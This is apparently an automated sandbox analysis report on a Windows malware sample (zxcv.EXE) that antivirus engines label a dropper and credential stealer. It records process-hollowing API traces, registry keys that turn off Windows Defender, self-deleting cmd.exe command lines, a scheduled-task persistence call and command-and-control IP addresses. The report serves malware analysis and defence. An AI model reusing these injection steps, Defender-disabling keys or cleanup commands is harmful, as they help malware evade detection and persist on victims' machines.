Resumed a suspended thread in a remote process potentially indicative of process injection (18 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2260 resumed a thread in remote process 1812
Process injection	Process 1836 resumed a thread in remote process 1632
Process injection	Process 2084 resumed a thread in remote process 2364
Process injection	Process 2412 resumed a thread in remote process 3932
Process injection	Process 2300 resumed a thread in remote process 4024
Process injection	Process 2488 resumed a thread in remote process 3180
Process injection	Process 808 resumed a thread in remote process 3332
Process injection	Process 932 resumed a thread in remote process 3084
Process injection	Process 3512 resumed a thread in remote process 3572
NtResumeThread Aug. 9, 2021, 9:26 a.m.	thread_handle: 0x000002a0 suspend_count: 1 process_identifier: 1812	1	0	0
NtResumeThread Aug. 9, 2021, 9:26 a.m.	thread_handle: 0x00000118 suspend_count: 1 process_identifier: 1632	1	0	0
NtResumeThread Aug. 9, 2021, 9:26 a.m.	thread_handle: 0x00000118 suspend_count: 1 process_identifier: 2364	1	0	0
NtResumeThread Aug. 9, 2021, 9:41 a.m.	thread_handle: 0x000003f0 suspend_count: 1 process_identifier: 3932	1	0	0
NtResumeThread Aug. 9, 2021, 9:41 a.m.	thread_handle: 0x000002b0 suspend_count: 1 process_identifier: 4024	1	0	0
NtResumeThread Aug. 9, 2021, 9:41 a.m.	thread_handle: 0x000002b8 suspend_count: 1 process_identifier: 3180	1	0	0
NtResumeThread Aug. 9, 2021, 9:41 a.m.	thread_handle: 0x00000518 suspend_count: 1 process_identifier: 3332	1	0	0
NtResumeThread Aug. 9, 2021, 9:41 a.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 3084	1	0	0
NtResumeThread Aug. 9, 2021, 9:41 a.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 3572	1	0	0

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

Detects VirtualBox using WNetGetProviderName trick (1 event)

Time & API	Arguments	Status	Return	Repeated
WNetGetProviderNameW Aug. 9, 2021, 9:26 a.m.	net_type: 0x00250000		1222	0

Generates some ICMP traffic

Disables Windows Security features (4 events)

description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection

Executed a process and injected code into it, probably while unpacking (50 out of 167 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Aug. 9, 2021, 9:26 a.m.	thread_identifier: 3016 thread_handle: 0x00000228 process_identifier: 1836 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\ProgramData\GFDyrtucbvfdg.exe track: 1 command_line: "C:\ProgramData\GFDyrtucbvfdg.exe" filepath_r: C:\ProgramData\GFDyrtucbvfdg.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000230	1	1
CreateProcessInternalW Aug. 9, 2021, 9:26 a.m.	thread_identifier: 2888 thread_handle: 0x000002a4 process_identifier: 2084 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Roaming\DSFnbyhgfrtydfg.exe track: 1 command_line: "C:\Users\test22\AppData\Roaming\DSFnbyhgfrtydfg.exe" filepath_r: C:\Users\test22\AppData\Roaming\DSFnbyhgfrtydfg.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000002b0	1	1
CreateProcessInternalW Aug. 9, 2021, 9:26 a.m.	thread_identifier: 2932 thread_handle: 0x000002a0 process_identifier: 1812 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\zxcv.EXE track: 1 command_line: filepath_r: C:\Users\test22\AppData\Local\Temp\zxcv.EXE stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x0000028c	1	1
NtGetContextThread Aug. 9, 2021, 9:26 a.m.	thread_handle: 0x000002a0	1	0
NtUnmapViewOfSection Aug. 9, 2021, 9:26 a.m.	base_address: 0x00400000 region_size: 4096 process_identifier: 1812 process_handle: 0x0000028c	1	0
NtMapViewOfSection Aug. 9, 2021, 9:26 a.m.	section_handle: 0x0000029c process_identifier: 1812 commit_size: 0 win32_protect: 64 (PAGE_EXECUTE_READWRITE) buffer: base_address: 0x00400000 allocation_type: 0 () section_offset: 0 view_size: 630784 process_handle: 0x0000028c	1	0
NtSetContextThread Aug. 9, 2021, 9:26 a.m.	registers.eip: 4804608 registers.esp: 1638384 registers.edi: 0 registers.eax: 4456511 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 2000355780 thread_handle: 0x000002a0 process_identifier: 1812	1	0
NtResumeThread Aug. 9, 2021, 9:26 a.m.	thread_handle: 0x000002a0 suspend_count: 1 process_identifier: 1812	1	0
CreateProcessInternalW Aug. 9, 2021, 9:26 a.m.	thread_identifier: 2092 thread_handle: 0x00000118 process_identifier: 1632 current_directory: filepath: C:\ProgramData\GFDyrtucbvfdg.exe track: 1 command_line: filepath_r: C:\ProgramData\GFDyrtucbvfdg.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000120	1	1
NtGetContextThread Aug. 9, 2021, 9:26 a.m.	thread_handle: 0x00000118	1	0
NtUnmapViewOfSection Aug. 9, 2021, 9:26 a.m.	base_address: 0x00400000 region_size: 4096 process_identifier: 1632 process_handle: 0x00000120	1	0
NtMapViewOfSection Aug. 9, 2021, 9:26 a.m.	section_handle: 0x000000e0 process_identifier: 1632 commit_size: 0 win32_protect: 64 (PAGE_EXECUTE_READWRITE) buffer: base_address: 0x00400000 allocation_type: 0 () section_offset: 0 view_size: 151552 process_handle: 0x00000120	1	0
NtSetContextThread Aug. 9, 2021, 9:26 a.m.	registers.eip: 4325376 registers.esp: 1638384 registers.edi: 0 registers.eax: 4302468 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 2000355780 thread_handle: 0x00000118 process_identifier: 1632	1	0
NtResumeThread Aug. 9, 2021, 9:26 a.m.	thread_handle: 0x00000118 suspend_count: 1 process_identifier: 1632	1	0
CreateProcessInternalW Aug. 9, 2021, 9:26 a.m.	thread_identifier: 2540 thread_handle: 0x00000118 process_identifier: 2364 current_directory: filepath: C:\Users\test22\AppData\Roaming\DSFnbyhgfrtydfg.exe track: 1 command_line: filepath_r: C:\Users\test22\AppData\Roaming\DSFnbyhgfrtydfg.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000120	1	1
NtGetContextThread Aug. 9, 2021, 9:26 a.m.	thread_handle: 0x00000118	1	0
NtUnmapViewOfSection Aug. 9, 2021, 9:26 a.m.	base_address: 0x00400000 region_size: 4096 process_identifier: 2364 process_handle: 0x00000120	1	0
NtMapViewOfSection Aug. 9, 2021, 9:26 a.m.	section_handle: 0x000000e0 process_identifier: 2364 commit_size: 0 win32_protect: 64 (PAGE_EXECUTE_READWRITE) buffer: base_address: 0x00400000 allocation_type: 0 () section_offset: 0 view_size: 233472 process_handle: 0x00000120	1	0
NtSetContextThread Aug. 9, 2021, 9:26 a.m.	registers.eip: 4407296 registers.esp: 1638384 registers.edi: 0 registers.eax: 4291211 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 2000355780 thread_handle: 0x00000118 process_identifier: 2364	1	0
NtResumeThread Aug. 9, 2021, 9:26 a.m.	thread_handle: 0x00000118 suspend_count: 1 process_identifier: 2364	1	0
NtResumeThread Aug. 9, 2021, 9:26 a.m.	thread_handle: 0x0000014c suspend_count: 1 process_identifier: 1812	1	0
CreateProcessInternalW Aug. 9, 2021, 9:27 a.m.	thread_identifier: 2948 thread_handle: 0x00000778 process_identifier: 2412 current_directory: C:\Users\test22\AppData\LocalLow filepath: C:\Users\test22\AppData\Local\Temp\4tWOdlbY5p.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\4tWOdlbY5p.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\4tWOdlbY5p.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000780	1	1
CreateProcessInternalW Aug. 9, 2021, 9:27 a.m.	thread_identifier: 1828 thread_handle: 0x00000754 process_identifier: 1472 current_directory: C:\Users\test22\AppData\LocalLow filepath: C:\Users\test22\AppData\Local\Temp\j6VXXENS27.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\j6VXXENS27.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\j6VXXENS27.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000784	1	1
CreateProcessInternalW Aug. 9, 2021, 9:27 a.m.	thread_identifier: 1492 thread_handle: 0x00000748 process_identifier: 2300 current_directory: C:\Users\test22\AppData\LocalLow filepath: C:\Users\test22\AppData\Local\Temp\crS9EKo8sM.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\crS9EKo8sM.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\crS9EKo8sM.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000076c	1	1
CreateProcessInternalW Aug. 9, 2021, 9:27 a.m.	thread_identifier: 604 thread_handle: 0x0000077c process_identifier: 2488 current_directory: C:\Users\test22\AppData\LocalLow filepath: C:\Users\test22\AppData\Local\Temp\V6QfXKl0VE.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\V6QfXKl0VE.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\V6QfXKl0VE.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000788	1	1
CreateProcessInternalW Aug. 9, 2021, 9:27 a.m.	thread_identifier: 1748 thread_handle: 0x00000778 process_identifier: 808 current_directory: C:\Users\test22\AppData\LocalLow filepath: C:\Users\test22\AppData\Local\Temp\Y9vZMbEz1g.exe track: 1 command_line: "C:\Users\test22\AppData\Local\Temp\Y9vZMbEz1g.exe" filepath_r: C:\Users\test22\AppData\Local\Temp\Y9vZMbEz1g.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000076c	1	1
CreateProcessInternalW Aug. 9, 2021, 9:27 a.m.	thread_identifier: 1928 thread_handle: 0x0000078c process_identifier: 2440 current_directory: filepath: track: 1 command_line: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\test22\AppData\Local\Temp\zxcv.EXE" filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000788	1	1
NtResumeThread Aug. 9, 2021, 9:26 a.m.	thread_handle: 0x000000f4 suspend_count: 1 process_identifier: 1632	1	0
CreateProcessInternalW Aug. 9, 2021, 9:26 a.m.	thread_identifier: 2948 thread_handle: 0x00000280 process_identifier: 2548 current_directory: C:\ProgramData filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\System32\cmd.exe" /c taskkill /pid 2364 & erase C:\Users\test22\AppData\Roaming\DSFnbyhgfrtydfg.exe & RD /S /Q C:\\ProgramData\\499642249564258\\* & exit filepath_r: C:\Windows\System32\cmd.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000278	1	1
CreateProcessInternalW Aug. 9, 2021, 9:26 a.m.	thread_identifier: 2412 thread_handle: 0x00000084 process_identifier: 2228 current_directory: C:\ProgramData filepath: C:\Windows\System32\taskkill.exe track: 1 command_line: taskkill /pid 2364 filepath_r: C:\Windows\system32\taskkill.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000088	1	1
NtResumeThread Aug. 9, 2021, 9:41 a.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 2412	1	0
NtResumeThread Aug. 9, 2021, 9:41 a.m.	thread_handle: 0x00000154 suspend_count: 1 process_identifier: 2412	1	0
NtResumeThread Aug. 9, 2021, 9:41 a.m.	thread_handle: 0x00000190 suspend_count: 1 process_identifier: 2412	1	0
NtResumeThread Aug. 9, 2021, 9:41 a.m.	thread_handle: 0x00000204 suspend_count: 1 process_identifier: 2412	1	0
NtGetContextThread Aug. 9, 2021, 9:41 a.m.	thread_handle: 0x000000e8	1	0
NtGetContextThread Aug. 9, 2021, 9:41 a.m.	thread_handle: 0x000000e8	1	0
NtResumeThread Aug. 9, 2021, 9:41 a.m.	thread_handle: 0x000000e8 suspend_count: 1 process_identifier: 2412	1	0
NtResumeThread Aug. 9, 2021, 9:41 a.m.	thread_handle: 0x000002a8 suspend_count: 1 process_identifier: 2412	1	0
NtGetContextThread Aug. 9, 2021, 9:41 a.m.	thread_handle: 0x000000e8	1	0
NtGetContextThread Aug. 9, 2021, 9:41 a.m.	thread_handle: 0x000000e8	1	0
NtResumeThread Aug. 9, 2021, 9:41 a.m.	thread_handle: 0x000000e8 suspend_count: 1 process_identifier: 2412	1	0
NtGetContextThread Aug. 9, 2021, 9:41 a.m.	thread_handle: 0x000000e8	1	0
NtGetContextThread Aug. 9, 2021, 9:41 a.m.	thread_handle: 0x000000e8	1	0
NtResumeThread Aug. 9, 2021, 9:41 a.m.	thread_handle: 0x000000e8 suspend_count: 1 process_identifier: 2412	1	0
CreateProcessInternalW Aug. 9, 2021, 9:41 a.m.	thread_identifier: 3728 thread_handle: 0x000003dc process_identifier: 3724 current_directory: C:\Users\test22\AppData\LocalLow filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dCtjCu" /XML "C:\Users\test22\AppData\Local\Temp\tmp671A.tmp" filepath_r: C:\Windows\System32\schtasks.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000003e4	1	1
CreateProcessInternalW Aug. 9, 2021, 9:41 a.m.	thread_identifier: 3792 thread_handle: 0x000003a0 process_identifier: 3788 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\4tWOdlbY5p.exe track: 1 command_line: "{path}" filepath_r: C:\Users\test22\AppData\Local\Temp\4tWOdlbY5p.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x0000039c	1	1
NtGetContextThread Aug. 9, 2021, 9:41 a.m.	thread_handle: 0x000003a0	1	0
NtAllocateVirtualMemory Aug. 9, 2021, 9:41 a.m.	process_identifier: 3788 region_size: 73728 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000039c		3221225496
CreateProcessInternalW Aug. 9, 2021, 9:41 a.m.	thread_identifier: 3828 thread_handle: 0x000003a4 process_identifier: 3824 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\4tWOdlbY5p.exe track: 1 command_line: "{path}" filepath_r: C:\Users\test22\AppData\Local\Temp\4tWOdlbY5p.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000394	1	1
NtGetContextThread Aug. 9, 2021, 9:41 a.m.	thread_handle: 0x000003a4	1	0

File has been identified by 50 AntiVirus engines on VirusTotal as malicious (50 events)

Bkav	W32.AIDetect.malware1
Elastic	malicious (high confidence)
MicroWorld-eScan	Trojan.GenericKD.46751499
FireEye	Generic.mg.7fb10b8ea68c1e00
McAfee	RDN/Generic.rp
Cylance	Unsafe
Sangfor	Trojan.Win32.Save.a
K7AntiVirus	Trojan ( 005807ea1 )
Alibaba	Trojan:Win32/Chapak.d9a0d0f4
K7GW	Trojan ( 005807ea1 )
Cybereason	malicious.ea68c1
Cyren	W32/VBKrypt.AXL.gen!Eldorado
Symantec	Trojan.Gen.MBT
ESET-NOD32	a variant of Win32/Injector.EPVS
APEX	Malicious
Paloalto	generic.ml
ClamAV	Win.Dropper.Raccoon-9884067-0
Kaspersky	Trojan.Win32.Chapak.ezwa
BitDefender	Trojan.GenericKD.46751499
Avast	Win32:DropperX-gen [Drp]
Ad-Aware	Trojan.GenericKD.46751499
Emsisoft	Trojan.Injector (A)
Comodo	Malware@#1q24cl87q1w3h
DrWeb	Trojan.Siggen14.56985
TrendMicro	TROJ_FRS.0NA103H621
McAfee-GW-Edition	BehavesLike.Win32.VirRansom.dc
Sophos	Mal/Generic-S
SentinelOne	Static AI - Malicious PE
Avira	TR/Dropper.Gen
MAX	malware (ai score=100)
Kingsoft	Win32.Troj.Chapak.ez.(kcloud)
Microsoft	Program:Win32/Multiverze
Gridinsoft	Trojan.Win32.Downloader.sa
GData	Trojan.GenericKD.46751499
Cynet	Malicious (score: 100)
AhnLab-V3	Trojan/Win.Fareit.R432645
BitDefenderTheta	Gen:NN.ZevbaF.34058.!m0@a4MIj6A
ALYac	Trojan.GenericKD.46751499
VBA32	BScope.TrojanPSW.Stelega
Malwarebytes	Spyware.RedLineStealer
TrendMicro-HouseCall	TROJ_FRS.0NA103H621
Rising	Trojan.Injector!1.C6AF (CLASSIC)
Yandex	Trojan.Chapak!t3JZovcpQgg
Ikarus	Trojan.Win32.Injector
Fortinet	W32/EPVS!tr
Webroot	W32.Azorult.aptc
AVG	Win32:DropperX-gen [Drp]
Panda	Trj/GdSda.A
CrowdStrike	win/malicious_confidence_90% (W)
Qihoo-360	Win32/TrojanDropper.Generic.HxQBueAA

Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (11 events)

dead_host	192.168.56.101:49341
dead_host	192.168.56.101:49340
dead_host	192.168.56.101:49313
dead_host	194.5.98.107:6970
dead_host	192.168.56.101:49345
dead_host	192.168.56.101:49342
dead_host	192.168.56.101:49325
dead_host	79.134.225.25:6969
dead_host	192.168.56.101:49330
dead_host	192.168.56.101:49343
dead_host	192.168.56.101:49344

zxcv.EXE

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All